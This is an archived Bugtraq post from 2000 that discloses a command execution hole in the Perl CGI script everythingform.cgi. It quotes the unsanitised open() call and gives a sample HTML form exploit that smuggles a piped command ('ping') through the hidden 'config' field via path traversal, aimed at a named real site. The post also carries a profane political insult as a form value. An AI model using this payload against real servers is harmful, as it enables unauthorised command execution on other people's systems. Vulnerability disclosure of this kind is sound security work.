Bugtraq mailing list archives
Insecure input validation in everythingform.cgi (remote command execution)
From: rpc <h () ckz org>
Date: Mon, 11 Dec 2000 14:16:03 GMT
Hi All, This is Yet Another Bad Perl Script. everythingform.cgi uses a hidden field 'config' to determine where to read configuration data from. --code snippit-- .. $ConfigFile = $in{config}; .. open(CONFIG, "$configdir$ConfigFile") || &Error("I can\'t open $ConfigFile in the ReadConfig subroutine. Reason: $!"); ------------ Information regarding everythingform can be found at: http://www.conservatives.net/atheist/scripts/index.html?everythingform Sample exploit: <form action="http://www.conservatives.net/someplace/everythingform.cgi" method=POST> <h1>everythingform.cgi exploit</h1> Command: <input type=text name=config value="../../../../../../../../bin/ping -c 5 www.foobar.com|"> <input type=hidden name=Name value="fuck the religious right"> <input type=hidden name="e-mail" value="foo () bar net"> <input type=hidden name=FavoriteColor value=Black> <input type=submit value=run> </form> --rpc
Current thread:
- Insecure input validation in everythingform.cgi (remote command execution) rpc (Dec 13)